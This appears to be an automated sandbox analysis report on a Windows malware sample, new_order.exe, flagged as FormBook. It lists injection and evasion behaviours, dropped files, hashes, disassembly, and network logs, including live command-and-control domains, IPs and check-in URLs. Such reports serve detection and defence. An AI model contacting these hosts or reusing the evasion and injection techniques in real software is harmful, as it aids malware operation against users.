          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)612
          Process Injection          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          File Deletion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562020 Sample: new_order.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 www.mydemosite0.com 2->31 33 mydemosite0.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 new_order.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\yvucmw.dll, PE32 11->29 dropped 59 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 15 new_order.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.bitherders.com 3.64.163.50, 49829, 80 AMAZON-02US United States 18->35 37 www.royalfountainlogistics.com 18->37 39 royalfountainlogistics.com 34.102.136.180, 49806, 80 GOOGLEUS United States 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 explorer.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          new_order.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.new_order.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.explorer.exe.1160000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          9.2.explorer.exe.4e0f840.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.0.new_order.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.new_order.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.new_order.exe.2660000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.0.new_order.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.explorer.exe.1160000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.new_order.exe.1acb0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.foodgw.com/os16/100%Avira URL Cloudmalware
          http://www.bitherders.com0%Avira URL Cloudsafe
          http://www.bitherders.com/os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj100%Avira URL Cloudmalware
          http://www.royalfountainlogistics.com/os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj0%Avira URL Cloudsafe
          http://www.bitherders.com/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mydemosite0.com
          		67.225.236.76
          		truetrue
            		unknown
            royalfountainlogistics.com
            		34.102.136.180
            		truefalse
              		unknown
              www.bitherders.com
              		3.64.163.50
              		truetrue
                		unknown
                www.royalfountainlogistics.com
                		unknown
                		unknowntrue
                  		unknown
                  www.mydemosite0.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.foodgw.com/os16/true
                    • Avira URL Cloud: malware
                    		low
                    http://www.bitherders.com/os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fjtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.royalfountainlogistics.com/os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fjfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.bitherders.comexplorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_Errornew_order.exefalse
                      		high
                      http://nsis.sf.net/NSIS_ErrorErrornew_order.exefalse
                        		high
                        http://www.bitherders.com/explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        34.102.136.180
                        		royalfountainlogistics.comUnited States
                        		15169GOOGLEUSfalse
                        3.64.163.50
                        		www.bitherders.comUnited States
                        		16509AMAZON-02UStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:562020
                        Start date:28.01.2022
                        Start time:10:32:44
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 51s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:new_order.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:21
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/4@3/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 59.8% (good quality ratio 55.3%)
                        • Quality average: 72.5%
                        • Quality standard deviation: 30.9%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\e0ikpv73pptzz5u

                        Download File
                        Process:C:\Users\user\Desktop\new_order.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):215627
                        Entropy (8bit):7.992619646459695
                        Encrypted:true
                        SSDEEP:6144:Zt0RpX6EopogjVRtFMZ1Y77rCTV3t4cEvc3:Zt0WEczRi1+CZtmc3
                        MD5:921105E71769C2A776A5202EC57D500A
                        SHA1:68C7C94675F4CE77F21E0AFDD453AACE4FD12A82
                        SHA-256:879DFF0A694537357F3D62A3F065301481313A9215AC5B30ECBA651AEE285C5C
                        SHA-512:19F4CD5199FAC52D27B82A29074BC72E6A0DED01D3DE3C40F7BD18D51C395DF542B5E43F9A7DB4158F8D274CE80033D22B2FA666F35BF86C3E84557ECEF8D6A4
                        Malicious:false
                        Reputation:low
                        Preview:b....u.}.;...G......w.....\.j..5.../+..|...i.~..F...H..@....m.....3....../.PUpW.x......W..~..h/..C...B..K.[l.78......W....;.|b....g......K.Xv.s.....`B.!...r....o.o..W.=..;fY$ u..I......n.9.z.'.&.v o..*~...t.f...k...Vs..%qsjW'..(Z..}..[.^..l.u..s...@m.8....q.....].G[.5.../+.V|....i.~..F...H..@...&..u}.qsS3.#.......o.u./...z..[<.!;.|.......}d..@...d....W....m.=.o........g....<.......C..A_.....}......W.=...... u.V.^..4.....9.z.'.&.. E.%B.......f...k..A....%qs..'...Z.y}....^...l.u.}sZ..@m.8,.........j..5.../+..|...i.~..F...H..@...&..u}.qsS3.#.......o.u./...z..[<.!;.|.......}d..@...d....W....m.=.o........g....<.......C..A_.....}......W.=..;fY$ u......4...F.9.z.'.&.. E.%B.....t.f...k..A....%qs..'...Z.y}....^...l.u.}sZ..@m.8,.........j..5.../+..|...i.~..F...H..@...&..u}.qsS3.#.......o.u./...z..[<.!;.|.......}d..@...d....W....m.=.o........g....<.......C..A_.....}......W.=..;fY$ u......4...F.9.z.'.&.. E.%B.....t.f...k..

                        C:\Users\user\AppData\Local\Temp\kqossegsxz

                        Download File
                        Process:C:\Users\user\Desktop\new_order.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5121
                        Entropy (8bit):6.1275996039074005
                        Encrypted:false
                        SSDEEP:96:vbcnI6/Wjco+SbpVX0VS4nSeTAt0UoSrxxqx3gJu5FyxwqS1LitlcqtvuZCb:onI6/WF7USYSlw5U+qS1A3vugb
                        MD5:5B3B44011F4EAB4760A86C6146D779C1
                        SHA1:E9AFDB159B4F7F7F1088B530A4AAC2DA079E3C7A
                        SHA-256:6C15CB1164F3F702D601A9BA18E6BBC4EF93D851778A725BC31308EED7760C37
                        SHA-512:2E4D4701C2506BF75FE8297B596ACB749DB6052330A00A2185D29A8FE879A37FA038C4F4AE1372D53245E532FAE97CE1A4FE3247875010ADCC2B8D9E197579D2
                        Malicious:false
                        Reputation:low
                        Preview:L;jcc..O.O......Scr.#.rv.Cr.#.rv.K..[c*._.ccc..Wcb.ob.s.[.K`ccc.;.?b.ob.s.[.KKccc.3.7b.ob.s.[.K6ccc.+./b.ob.s.[.K!ccc.#.'..sg..k..#ff.o..C.G.s.Kg.,.K.O.K._.g$.5.s.ZT.Kf._.g%._....W.GS.Kcccc.g.h..._b.;.b.3.b.+..b.#..b.C.b.K..Y.s..oZ..W..Qd.Sb.;...krh.Sf._Kcccc*..g.ccc.g.p...W...S....H.%oc..O..r.#.rv.[.k.c..o..k.c.s.w$.[.$g._.k.c..k.d.[._.H.%oc.y]).K.eccK.ecc%wc..bB.K.eccK.ecc%kc.p...K.eccK.ecc%kc..O.O.r.#.rv.K*.[sccc.;._..[c.y._)cc._.._.[..[NGKwhcc.#..k..k..,c.p;.p?.K..k.$Dc.p;.p?.e.k..#c.h;...bB.K4dcc.K1`bb.WNr.K.b.kK.bbb.W..Wc.i..ScNj*.Sdccc.S.H.%gc..O.O.r.#.rv.K*.[.ccc.#._..[c.y._)cc._.._.[..[NGK.gcc.#r..ccc.k..k..,c.p#.p'.o..k.$Dc.p#.p'.s..k.4D.p#.p'.w.,.k..5f.x#.x'.K..k.$De.p#.p'.h.k..#c.h#..y]).KIccc.KF_bb.W..{c.k.K.{.dNzb.{b.wb.sb.ob.kK.abb.W..Wc.i..ScNj*.Sdccc.S.H.%wc..O.O.*.[sccc.G._..[c.y._)cc._.._.[..[NGK.fcc.#..k..k..,c.pG.pK.o..k.$Dc.pG.pK.e.k..#c.hG..p...K.ccc.K._bb.WNqb.

                        C:\Users\user\AppData\Local\Temp\nsq94FC.tmp\yvucmw.dll

                        Download File
                        Process:C:\Users\user\Desktop\new_order.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):20992
                        Entropy (8bit):5.741159742941817
                        Encrypted:false
                        SSDEEP:384:uo6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbofSb:uoG1albrXY0HwinMdZeUhboab
                        MD5:86475A0DBD24B01BCD1B264FECFDF1A2
                        SHA1:745CE764EB6C9BF86E5AE65A5F365E7FAF14A394
                        SHA-256:4CE85A4D12AA0D5B072330DBC50393D2D29EBA5321BEB3B3BFC6C4A8E9306AD7
                        SHA-512:E14DC2F083BD976482554B62B875645815F6F6BCB9B604B366B7F854E2620222DE8F038BB8DDBC2026082476246A9CC1855C6AA1B1CC2A1415FEB4A75B4EACA1
                        Malicious:false
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L...U..a...........!.....@...................P............................................@.........................0Q..L...|Q.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\nsv94CC.tmp

                        Download File
                        Process:C:\Users\user\Desktop\new_order.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):267309
                        Entropy (8bit):7.661744346775928
                        Encrypted:false
                        SSDEEP:6144:R7t0RpX6EopogjVRtFMZ1Y77rCTV3t4cEvcGDw:Jt0WEczRi1+CZtmcG
                        MD5:852AD076286B6472228677C4224BDDD7
                        SHA1:D11BEB7702EC783895F2CE4507F49B8333D6D555
                        SHA-256:6C64A99477E6D61945489DF8DCEF2AF8782AE6D5E9C50F5F5085D4970225370B
                        SHA-512:F524F2CC5DD2280BBD8E81A8629E523F840E52F1F4FBC561E0782A0E324EDAB4D15D56DD55D6484E766263E20E14594FF82B9BAE7FE1D7AEA65BB03AFB0DFA03
                        Malicious:false
                        Reputation:low
                        Preview:.c......,...................3....K.......b.......c..........................................................................................................................................................................................................................................J...............S...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.929386224484157
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 92.16%
                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:new_order.exe
                        File size:253458
                        MD5:a0e70d1760e60d81e0f4ac2904fa8002
                        SHA1:0512dcf545274ac6512abf3fb31a6fff41614280
                        SHA256:0cd606362bbe747f3d0c0193675ce46ea2920fba28580b784f50a2969bbb0c27
                        SHA512:59c04bc30b9f279d434428011efe80d41fd5de99c92165c77dc2a097b742c60e676f65d6185c90d9e5ddfd181fd4a32c7d237ca75ed2be978c6b951be6ae8588
                        SSDEEP:6144:ow9b+8zbnoCMYqpvN/NlL7A+H9zKeKE6QGLxWyvS:NzzkzX7A+HJPifLu
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                        File Icon

                        Icon Hash:b2a88c96b2ca6a72

                        Static PE Info

                        General

                        Entrypoint:0x403225
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:099c0646ea7282d232219f8807883be0

                        Entrypoint Preview

                        Instruction
                        sub esp, 00000180h
                        push ebx
                        push ebp
                        push esi
                        xor ebx, ebx
                        push edi
                        mov dword ptr [esp+18h], ebx
                        mov dword ptr [esp+10h], 00409128h
                        xor esi, esi
                        mov byte ptr [esp+14h], 00000020h
                        call dword ptr [00407030h]
                        push 00008001h
                        call dword ptr [004070B4h]
                        push ebx
                        call dword ptr [0040727Ch]
                        push 00000008h
                        mov dword ptr [00423F58h], eax
                        call 00007F733D0CE320h
                        mov dword ptr [00423EA4h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041F450h
                        call dword ptr [00407158h]
                        push 004091B0h
                        push 004236A0h
                        call 00007F733D0CDFD7h
                        call dword ptr [004070B0h]
                        mov edi, 00429000h
                        push eax
                        push edi
                        call 00007F733D0CDFC5h
                        push ebx
                        call dword ptr [0040710Ch]
                        cmp byte ptr [00429000h], 00000022h
                        mov dword ptr [00423EA0h], eax
                        mov eax, edi
                        jne 00007F733D0CB7ECh
                        mov byte ptr [esp+14h], 00000022h
                        mov eax, 00429001h
                        push dword ptr [esp+14h]
                        push eax
                        call 00007F733D0CDAB8h
                        push eax
                        call dword ptr [0040721Ch]
                        mov dword ptr [esp+1Ch], eax
                        jmp 00007F733D0CB845h
                        cmp cl, 00000020h
                        jne 00007F733D0CB7E8h
                        inc eax
                        cmp byte ptr [eax], 00000020h
                        je 00007F733D0CB7DCh
                        cmp byte ptr [eax], 00000022h
                        mov byte ptr [eax+eax+00h], 00000000h

                        Rich Headers

                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x2c1900x2e8dataEnglishUnited States
                        RT_DIALOG0x2c4780x100dataEnglishUnited States
                        RT_DIALOG0x2c5780x11cdataEnglishUnited States
                        RT_DIALOG0x2c6980x60dataEnglishUnited States
                        RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                        RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                        Imports

                        DLLImport
                        KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                        SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        01/28/22-10:35:12.114127TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980680192.168.2.434.102.136.180
                        01/28/22-10:35:12.114127TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980680192.168.2.434.102.136.180
                        01/28/22-10:35:12.114127TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980680192.168.2.434.102.136.180
                        01/28/22-10:35:12.228646TCP1201ATTACK-RESPONSES 403 Forbidden804980634.102.136.180192.168.2.4
                        01/28/22-10:35:33.102852TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.43.64.163.50
                        01/28/22-10:35:33.102852TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.43.64.163.50
                        01/28/22-10:35:33.102852TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982980192.168.2.43.64.163.50

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 28, 2022 10:35:12.094950914 CET4980680192.168.2.434.102.136.180
                        Jan 28, 2022 10:35:12.113820076 CET804980634.102.136.180192.168.2.4
                        Jan 28, 2022 10:35:12.113967896 CET4980680192.168.2.434.102.136.180
                        Jan 28, 2022 10:35:12.114126921 CET4980680192.168.2.434.102.136.180
                        Jan 28, 2022 10:35:12.133012056 CET804980634.102.136.180192.168.2.4
                        Jan 28, 2022 10:35:12.228646040 CET804980634.102.136.180192.168.2.4
                        Jan 28, 2022 10:35:12.228684902 CET804980634.102.136.180192.168.2.4
                        Jan 28, 2022 10:35:12.228990078 CET4980680192.168.2.434.102.136.180
                        Jan 28, 2022 10:35:12.348798990 CET4980680192.168.2.434.102.136.180
                        Jan 28, 2022 10:35:12.367767096 CET804980634.102.136.180192.168.2.4
                        Jan 28, 2022 10:35:33.082981110 CET4982980192.168.2.43.64.163.50
                        Jan 28, 2022 10:35:33.102547884 CET80498293.64.163.50192.168.2.4
                        Jan 28, 2022 10:35:33.102688074 CET4982980192.168.2.43.64.163.50
                        Jan 28, 2022 10:35:33.102852106 CET4982980192.168.2.43.64.163.50
                        Jan 28, 2022 10:35:33.121958971 CET80498293.64.163.50192.168.2.4
                        Jan 28, 2022 10:35:33.121994019 CET80498293.64.163.50192.168.2.4
                        Jan 28, 2022 10:35:33.122025013 CET80498293.64.163.50192.168.2.4
                        Jan 28, 2022 10:35:33.122153044 CET4982980192.168.2.43.64.163.50
                        Jan 28, 2022 10:35:33.122200012 CET4982980192.168.2.43.64.163.50
                        Jan 28, 2022 10:35:33.141402006 CET80498293.64.163.50192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 28, 2022 10:35:12.069257975 CET5662753192.168.2.48.8.8.8
                        Jan 28, 2022 10:35:12.088390112 CET53566278.8.8.8192.168.2.4
                        Jan 28, 2022 10:35:33.026738882 CET5662153192.168.2.48.8.8.8
                        Jan 28, 2022 10:35:33.047683001 CET53566218.8.8.8192.168.2.4
                        Jan 28, 2022 10:35:53.270422935 CET6480153192.168.2.48.8.8.8
                        Jan 28, 2022 10:35:53.404603004 CET53648018.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jan 28, 2022 10:35:12.069257975 CET192.168.2.48.8.8.80x5dc9Standard query (0)www.royalfountainlogistics.comA (IP address)IN (0x0001)
                        Jan 28, 2022 10:35:33.026738882 CET192.168.2.48.8.8.80xe568Standard query (0)www.bitherders.comA (IP address)IN (0x0001)
                        Jan 28, 2022 10:35:53.270422935 CET192.168.2.48.8.8.80xf305Standard query (0)www.mydemosite0.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jan 28, 2022 10:35:12.088390112 CET8.8.8.8192.168.2.40x5dc9No error (0)www.royalfountainlogistics.comroyalfountainlogistics.comCNAME (Canonical name)IN (0x0001)
                        Jan 28, 2022 10:35:12.088390112 CET8.8.8.8192.168.2.40x5dc9No error (0)royalfountainlogistics.com34.102.136.180A (IP address)IN (0x0001)
                        Jan 28, 2022 10:35:33.047683001 CET8.8.8.8192.168.2.40xe568No error (0)www.bitherders.com3.64.163.50A (IP address)IN (0x0001)
                        Jan 28, 2022 10:35:53.404603004 CET8.8.8.8192.168.2.40xf305No error (0)www.mydemosite0.commydemosite0.comCNAME (Canonical name)IN (0x0001)
